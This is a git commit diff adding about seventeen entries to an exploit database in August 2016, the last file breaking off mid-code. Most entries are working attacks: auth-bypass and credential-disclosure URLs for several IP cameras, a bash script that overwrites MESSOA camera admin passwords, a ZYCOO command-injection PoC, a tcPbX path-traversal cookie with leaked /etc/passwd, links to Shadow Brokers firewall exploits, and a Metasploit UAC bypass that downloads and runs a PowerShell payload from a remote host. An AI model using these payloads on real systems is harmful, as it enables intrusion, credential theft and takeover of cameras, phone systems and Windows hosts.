DB: 2016-08-20
17 new exploits Too many to list!
This commit is contained in:
parent
ae53a02150
commit
32bd251480
18 changed files with 2277 additions and 1652 deletions
42
platforms/cgi/webapps/40262.txt
Executable file
42
platforms/cgi/webapps/40262.txt
Executable file
|
@ -0,0 +1,42 @@
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Multiple SIEMENS IP Cameras auth bypass configuration download
|
||||||
|
#
|
||||||
|
# Tested:
|
||||||
|
# SIEMENS IP Camera CCID1410-ST X.1.0.24
|
||||||
|
# SIEMENS IP Camera CCMW1025 x.2.2.1798
|
||||||
|
# SIEMENS IP Camera CCMS2025 x.2.2.1798
|
||||||
|
# SIEMENS IP Camera CVMS2025-IR x.2.2.1798
|
||||||
|
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458
|
||||||
|
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1
|
||||||
|
# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58
|
||||||
|
#
|
||||||
|
# ...and more, more devices who use same firmware
|
||||||
|
#
|
||||||
|
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
# http://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
|
||||||
|
http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini
|
||||||
|
|
40
platforms/cgi/webapps/40263.txt
Executable file
40
platforms/cgi/webapps/40263.txt
Executable file
|
@ -0,0 +1,40 @@
|
||||||
|
1. Advisory Information
|
||||||
|
========================================
|
||||||
|
Title : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure
|
||||||
|
Vendor Homepage : https://is.spiap.com/
|
||||||
|
Remotely Exploitable : Yes
|
||||||
|
Tested on Camera types : CCPW3025-IR , CVMW3025-IR
|
||||||
|
Product References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html
|
||||||
|
+ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html
|
||||||
|
Vulnerability : Username / Password Disclosure (Critical/High)
|
||||||
|
Shodan Dork : title:"Vanderbilt IP-Camera"
|
||||||
|
Date : 19/08/2016
|
||||||
|
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||||
|
|
||||||
|
|
||||||
|
2. CREDIT
|
||||||
|
========================================
|
||||||
|
This vulnerability was identified during penetration test by Yakir Wizman.
|
||||||
|
|
||||||
|
|
||||||
|
3. Description
|
||||||
|
========================================
|
||||||
|
Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
|
||||||
|
|
||||||
|
|
||||||
|
4. Proof-of-Concept:
|
||||||
|
========================================
|
||||||
|
Simply go to the following url:
|
||||||
|
http://host:port/cgi-bin/readfile.cgi?query=ADMINID
|
||||||
|
|
||||||
|
Should return some javascript variable which contain the credentials and other configuration vars:
|
||||||
|
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
|
||||||
|
|
||||||
|
-----------------------------------------------
|
||||||
|
|
||||||
|
Login @ http://host:port/cgi-bin/chklogin.cgi
|
||||||
|
|
||||||
|
|
||||||
|
5. SOLUTION
|
||||||
|
========================================
|
||||||
|
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
|
38
platforms/cgi/webapps/40264.txt
Executable file
38
platforms/cgi/webapps/40264.txt
Executable file
|
@ -0,0 +1,38 @@
|
||||||
|
1. Advisory Information
|
||||||
|
========================================
|
||||||
|
Title : JVC IP-Camera (VN-T216VPRU) Remote Credentials Disclosure
|
||||||
|
Vendor Homepage : http://pro.jvc.com/
|
||||||
|
Remotely Exploitable : Yes
|
||||||
|
Tested on Camera types : VN-T216VPRU
|
||||||
|
Product References : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145
|
||||||
|
Vulnerability : Username / Password Disclosure (Critical/High)
|
||||||
|
Date : 19/08/2016
|
||||||
|
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||||
|
|
||||||
|
|
||||||
|
2. CREDIT
|
||||||
|
========================================
|
||||||
|
This vulnerability was identified during penetration test by Yakir Wizman.
|
||||||
|
|
||||||
|
|
||||||
|
3. Description
|
||||||
|
========================================
|
||||||
|
JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
|
||||||
|
|
||||||
|
|
||||||
|
4. Proof-of-Concept:
|
||||||
|
========================================
|
||||||
|
Simply go to the following url:
|
||||||
|
http://host:port/cgi-bin/readfile.cgi?query=ADMINID
|
||||||
|
|
||||||
|
Should return some javascript variable which contain the credentials and other configuration vars:
|
||||||
|
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
|
||||||
|
|
||||||
|
-----------------------------------------------
|
||||||
|
|
||||||
|
Login @ http://host:port/cgi-bin/chklogin.cgi
|
||||||
|
|
||||||
|
|
||||||
|
5. SOLUTION
|
||||||
|
========================================
|
||||||
|
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
|
56
platforms/cgi/webapps/40265.txt
Executable file
56
platforms/cgi/webapps/40265.txt
Executable file
|
@ -0,0 +1,56 @@
|
||||||
|
1. Advisory Information
|
||||||
|
========================================
|
||||||
|
Title : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass
|
||||||
|
Vendor Homepage : http://www.cash2s.com/en/
|
||||||
|
Remotely Exploitable : Yes
|
||||||
|
Tested on Camera types : IRDOME-II-C2S, IRBOX-II-C2S, DVR
|
||||||
|
Vulnerabilities : Credentials Disclosure
|
||||||
|
+ : Authentication bypass
|
||||||
|
Date : 19/08/2016
|
||||||
|
Shodan Dork : html:write.cgi "Content-length: 2676"
|
||||||
|
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||||
|
|
||||||
|
|
||||||
|
2. CREDIT
|
||||||
|
========================================
|
||||||
|
This vulnerability was identified during penetration test by Yakir Wizman.
|
||||||
|
|
||||||
|
|
||||||
|
3. Description
|
||||||
|
========================================
|
||||||
|
C2S DVR allows to unauthenticated user disclose the username & password remotely by simple request to the server page 'read.cgi?page=2' which can be made by browser or burp/fiddler.
|
||||||
|
Moreover, an attacker could easily access to password change page without any authentication, thats happen cuase the web application does not perform any session management.
|
||||||
|
|
||||||
|
|
||||||
|
4. Proof-of-Concept:
|
||||||
|
========================================
|
||||||
|
Remote Credentials Disclosure:
|
||||||
|
-----------------------------------------------
|
||||||
|
Simply go to the following url to read the credentials:
|
||||||
|
http://host:port/cgi-bin/read.cgi?page=2
|
||||||
|
|
||||||
|
Should return some javascript variable which contain the credentials and other configuration vars:
|
||||||
|
|
||||||
|
var pw_enflag = "1";
|
||||||
|
var pw_adminpw = "12345";
|
||||||
|
var pw_retype1 = "12345";
|
||||||
|
var pw_userpw = "56789";
|
||||||
|
var pw_retype2 = "56789";
|
||||||
|
var pw_autolock = "0";
|
||||||
|
|
||||||
|
|
||||||
|
Login @ http://host:port/
|
||||||
|
-----------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Authentication Bypass:
|
||||||
|
-----------------------------------------------
|
||||||
|
The application does not require a valid session for any page on the server, for example you can access to 'password.htm' which allows you to change/disclose the admin password with just a few clicks.
|
||||||
|
|
||||||
|
http://host:port/password.htm?parm1=&parm2=1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
5. SOLUTION
|
||||||
|
========================================
|
||||||
|
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
|
30
platforms/cgi/webapps/40266.txt
Executable file
30
platforms/cgi/webapps/40266.txt
Executable file
|
@ -0,0 +1,30 @@
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# TOSHIBA IK-WP41A IP-Camera auth bypass configuration download
|
||||||
|
#
|
||||||
|
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
# http://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
|
||||||
|
|
30
platforms/cgi/webapps/40267.txt
Executable file
30
platforms/cgi/webapps/40267.txt
Executable file
|
@ -0,0 +1,30 @@
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# MESSOA NIC990 IP-Camera auth bypass configuration download
|
||||||
|
#
|
||||||
|
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||||
|
# http://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
|
||||||
|
|
61
platforms/cgi/webapps/40269.txt
Executable file
61
platforms/cgi/webapps/40269.txt
Executable file
|
@ -0,0 +1,61 @@
|
||||||
|
Vulnerable hardware : ZYCOO IP phone system
|
||||||
|
Vendor : zycoo.com
|
||||||
|
Author : Ahmed sultan (@0x4148)
|
||||||
|
Email : 0x4148@gmail.com
|
||||||
|
|
||||||
|
Summary : According to the vendor's site ,
|
||||||
|
CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market.
|
||||||
|
They provide not only traditional PBX functions such as automated attendant and voicemail,
|
||||||
|
but also offer many advance telephony features, including remote extensions, remote office connection,
|
||||||
|
IVR, call recording, call detail records(CDR)…
|
||||||
|
|
||||||
|
Vulnerable file : /www/cgi-bin/system_cmd.cgi
|
||||||
|
|
||||||
|
Code shot :
|
||||||
|
|
||||||
|
#!/bin/hush
|
||||||
|
printf '\r\n'
|
||||||
|
if [ -n "$REQUEST_METHOD" ]; then
|
||||||
|
case "$REQUEST_METHOD" in
|
||||||
|
(GET)
|
||||||
|
if [ -n "$QUERY_STRING" ]; then
|
||||||
|
for args in `echo "$QUERY_STRING" | tr "&" " "`
|
||||||
|
do
|
||||||
|
param=`echo "$args" | cut -d "=" -f 1`
|
||||||
|
value=`echo "$args" | cut -d "=" -f 2`
|
||||||
|
eval "export $param=$value"
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
fi
|
||||||
|
INI_FILE=/etc/asterisk/manager.conf
|
||||||
|
INI_SECTION=$username
|
||||||
|
eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
|
||||||
|
-e 's/;.*$//' \
|
||||||
|
-e 's/[[:space:]]*$//' \
|
||||||
|
-e 's/^[[:space:]]*//' \
|
||||||
|
-e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \
|
||||||
|
< $INI_FILE \
|
||||||
|
| sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`
|
||||||
|
password="`/etc/scripts/decodeURI $password`"
|
||||||
|
[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret`
|
||||||
|
if [ "$password" = "$secret" ]; then
|
||||||
|
cmd=`echo $cmd | sed 's/%20/ /g'`
|
||||||
|
# cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo`
|
||||||
|
$cmd
|
||||||
|
|
||||||
|
the GET parameter cmd is freely available to directly execute system commands with no prior required authentication
|
||||||
|
which lead to full hardware takeover
|
||||||
|
|
||||||
|
POC
|
||||||
|
[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd'
|
||||||
|
root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh
|
||||||
|
nobody:x:99:99:Nobody::
|
||||||
|
|
||||||
|
Also by reading file /etc/asterisk/manager.conf
|
||||||
|
hardware admin's password can be obtained in plain text
|
||||||
|
|
||||||
|
Fixing?
|
||||||
|
Unfortunately the hardware frontend really depend on this file , and the vendor is super lazy on replying on the emails regarding this vulnerability
|
||||||
|
so , best fixation for now is enabling the web interface browsing from the local network only
|
8
platforms/cgi/webapps/40272.txt
Executable file
8
platforms/cgi/webapps/40272.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.topsec.com.cn/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40272.zip
|
8
platforms/cgi/webapps/40273.txt
Executable file
8
platforms/cgi/webapps/40273.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.topsec.com.cn/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40273.zip
|
8
platforms/cgi/webapps/40274.txt
Executable file
8
platforms/cgi/webapps/40274.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.topsec.com.cn/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40274.zip
|
52
platforms/cgi/webapps/40277.sh
Executable file
52
platforms/cgi/webapps/40277.sh
Executable file
|
@ -0,0 +1,52 @@
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Multiple MESSOA IP-Cameras auth bypass admin user/password changer
|
||||||
|
#
|
||||||
|
# Tested:
|
||||||
|
# MESSOA NIC 835 Release: X.2.1.8
|
||||||
|
# MESSOA NIC 835-HN5 Release: X.2.1.17
|
||||||
|
# MESSOA NIC 836 Release: X.2.1.7
|
||||||
|
# MESSOA NDZ 860 Release: X.3.0.6.1
|
||||||
|
# MESSOA
|
||||||
|
#
|
||||||
|
# Copyright 2016 (c) Todor Donev
|
||||||
|
# <todor.donev at gmail.com>
|
||||||
|
# http://www.ethical-hacker.org/
|
||||||
|
# https://www.facebook.com/ethicalhackerorg
|
||||||
|
#
|
||||||
|
# Disclaimer:
|
||||||
|
# This or previous programs is for Educational
|
||||||
|
# purpose ONLY. Do not use it without permission.
|
||||||
|
# The usual disclaimer applies, especially the
|
||||||
|
# fact that Todor Donev is not liable for any
|
||||||
|
# damages caused by direct or indirect use of the
|
||||||
|
# information or functionality provided by these
|
||||||
|
# programs. The author or any Internet provider
|
||||||
|
# bears NO responsibility for content or misuse
|
||||||
|
# of these programs or any derivatives thereof.
|
||||||
|
# By using these programs you accept the fact
|
||||||
|
# that any damage (dataloss, system crash,
|
||||||
|
# system compromise, etc.) caused by the use
|
||||||
|
# of these programs is not Todor Donev's
|
||||||
|
# responsibility.
|
||||||
|
#
|
||||||
|
# Use them at your own risk!
|
||||||
|
#
|
||||||
|
|
||||||
|
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||||
|
echo " [ MESSOA IP-Cameras auth bypass admin user/password changer"
|
||||||
|
echo " [ ==="
|
||||||
|
echo " [ Usage: $0 <target> <user> <password>"
|
||||||
|
echo " [ Example: $0 192.168.1.200:80 hacker teflon"
|
||||||
|
echo " [ ==="
|
||||||
|
echo " [ Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||||
|
echo " [ Website: http://www.ethical-hacker.org/"
|
||||||
|
echo " [ Facebook: https://www.facebook.com/ethicalhackerorg "
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET=`which GET 2>/dev/null`
|
||||||
|
if [ $? -ne 0 ]; then
|
||||||
|
echo " [ Error : libwww-perl not found =/"
|
||||||
|
exit;
|
||||||
|
fi
|
||||||
|
GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$3&UpSectionName=ADMINID" 0&> /dev/null <&1
|
8
platforms/hardware/local/40271.txt
Executable file
8
platforms/hardware/local/40271.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.cisco.com/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip
|
8
platforms/hardware/remote/40275.txt
Executable file
8
platforms/hardware/remote/40275.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.topsec.com.cn/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40275.zip
|
8
platforms/hardware/webapps/40276.txt
Executable file
8
platforms/hardware/webapps/40276.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: https://www.fortinet.com/products/fortigate/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip
|
8
platforms/linux/local/40270.txt
Executable file
8
platforms/linux/local/40270.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
# Exploit Title: WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)
|
||||||
|
# Date: 19-08-2016
|
||||||
|
# Exploit Author: Shadow Brokers
|
||||||
|
# Vendor Homepage: http://www.watchguard.com/
|
||||||
|
|
||||||
|
|
||||||
|
Full Exploit:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40270.zip
|
66
platforms/php/webapps/40278.txt
Executable file
66
platforms/php/webapps/40278.txt
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
Vulnerable hardware : tcpbx voip distro
|
||||||
|
Vendor : www.tcpbx.org
|
||||||
|
Author : Ahmed sultan (@0x4148)
|
||||||
|
Email : 0x4148@gmail.com
|
||||||
|
|
||||||
|
Summary : According to the vendor's site ,
|
||||||
|
tcPbX is a complete and functional VoIP phone system based on Asterisk open
|
||||||
|
source software and CentOS operating system.
|
||||||
|
The simplified installation and the new administration portal allow you to
|
||||||
|
have a full featured phone system in less than an hour without specific
|
||||||
|
skills on linux or asterisk
|
||||||
|
|
||||||
|
Vulnerable file : /var/www/html/tcpbx/index.php
|
||||||
|
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
|
||||||
|
sanitized before being proceeded in the file
|
||||||
|
|
||||||
|
Request
|
||||||
|
GET /tcpbx/ HTTP/1.1
|
||||||
|
Host: server
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
|
||||||
|
Gecko/20100101 Firefox/47.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
|
||||||
|
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
|
||||||
|
Connection: close
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
-----------------------------------
|
||||||
|
Response
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Fri, 19 Aug 2016 15:45:30 GMT
|
||||||
|
Server: Apache/2.2.15 (CentOS)
|
||||||
|
X-Powered-By: PHP/5.3.3
|
||||||
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||||
|
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
|
||||||
|
pre-check=0
|
||||||
|
Pragma: no-cache
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
Content-Length: 23874
|
||||||
|
|
||||||
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
bin:x:1:1:bin:/bin:/sbin/nologin
|
||||||
|
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||||||
|
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
||||||
|
sync:x:5:0:sync:/sbin:/bin/sync
|
||||||
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
||||||
|
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
|
||||||
|
operator:x:11:0:operator:/root:/sbin/nologin
|
||||||
|
games:x:12:100:games:/usr/games:/sbin/nologin
|
||||||
|
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
|
||||||
|
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
||||||
|
nobody:x:99:99:Nobody:/:/sbin/nologin
|
||||||
|
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
||||||
|
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
||||||
|
ntp:x:38:38::/etc/ntp:/sbin/nologin
|
||||||
|
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
|
||||||
|
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
|
||||||
|
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
|
||||||
|
apache:x:48:48:Apache:/var/www:/sbin/nologin
|
||||||
|
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
|
||||||
|
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
|
137
platforms/windows/local/40268.rb
Executable file
137
platforms/windows/local/40268.rb
Executable file
|
@ -0,0 +1,137 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Local
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Exploit::EXE
|
||||||
|
include Post::File
|
||||||
|
include Post::Windows::Priv
|
||||||
|
include Post::Windows::Runas
|
||||||
|
include Post::Windows::Registry
|
||||||
|
include Post::Windows::Powershell
|
||||||
|
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super( update_info(info,
|
||||||
|
'Name' => 'Windows Escalate UAC Protection Bypass with Fileless',
|
||||||
|
'Description' => %q{
|
||||||
|
This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
|
'Matt Graeber',
|
||||||
|
'Enigma0x3',
|
||||||
|
'Pablo Gonzalez' # Port to local exploit
|
||||||
|
],
|
||||||
|
'Platform' => [ 'win' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'References' => [
|
||||||
|
[ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'],
|
||||||
|
],
|
||||||
|
'DisclosureDate'=> "Aug 15 2016"
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']),
|
||||||
|
OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']),
|
||||||
|
OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ),
|
||||||
|
])
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_permissions!
|
||||||
|
# Check if you are an admin
|
||||||
|
vprint_status('Checking admin status...')
|
||||||
|
admin_group = is_in_admin_group?
|
||||||
|
|
||||||
|
if admin_group.nil?
|
||||||
|
print_error('Either whoami is not there or failed to execute')
|
||||||
|
print_error('Continuing under assumption you already checked...')
|
||||||
|
else
|
||||||
|
if admin_group
|
||||||
|
print_good('Part of Administrators group! Continuing...')
|
||||||
|
else
|
||||||
|
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||||
|
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
validate_environment!
|
||||||
|
|
||||||
|
case get_uac_level
|
||||||
|
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||||
|
fail_with(Failure::NotVulnerable,
|
||||||
|
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
|
||||||
|
)
|
||||||
|
when UAC_DEFAULT
|
||||||
|
print_good 'UAC is set to Default'
|
||||||
|
print_good 'BypassUAC can bypass this setting, continuing...'
|
||||||
|
when UAC_NO_PROMPT
|
||||||
|
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||||
|
runas_method
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command')
|
||||||
|
|
||||||
|
if keys == nil
|
||||||
|
print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!")
|
||||||
|
end
|
||||||
|
|
||||||
|
key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command')
|
||||||
|
reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')"
|
||||||
|
|
||||||
|
command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true})
|
||||||
|
if datastore['LOCAL']
|
||||||
|
if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
|
||||||
|
